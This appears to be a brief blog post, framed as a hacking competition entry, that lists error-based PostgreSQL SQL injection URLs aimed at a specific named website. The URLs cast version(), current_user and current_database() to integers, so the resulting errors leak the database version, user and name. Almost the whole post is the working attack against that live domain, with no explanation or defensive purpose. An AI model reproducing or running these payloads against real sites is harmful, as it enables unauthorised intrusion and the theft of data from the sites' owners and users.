HM inter hacking competition

target domain:
http://www.mikromaailm.ee/


cari db version, db name, db user & its operating system/distro

answer vuln postgresql..

db version
http://www.mikromaailm.ee/mikro?ln=est&mid=61 and 1 = CAST(version() as int)


db user
http://www.mikromaailm.ee/mikro?ln=est&mid=61 and 1 = CAST(current_user||CHR(0) as int)


db name
http://www.mikromaailm.ee/mikro?ln=est&mid=61 and 1 = CAST(current_database()||CHR(0) as int)



http://www.mikromaailm.ee/mikro?ln=est&mid=61%20and%201%20=%20CAST(current_user||CHR(58)||current_database()||CHR(58)||version()%20as%20int)


0 comments:

Post a Comment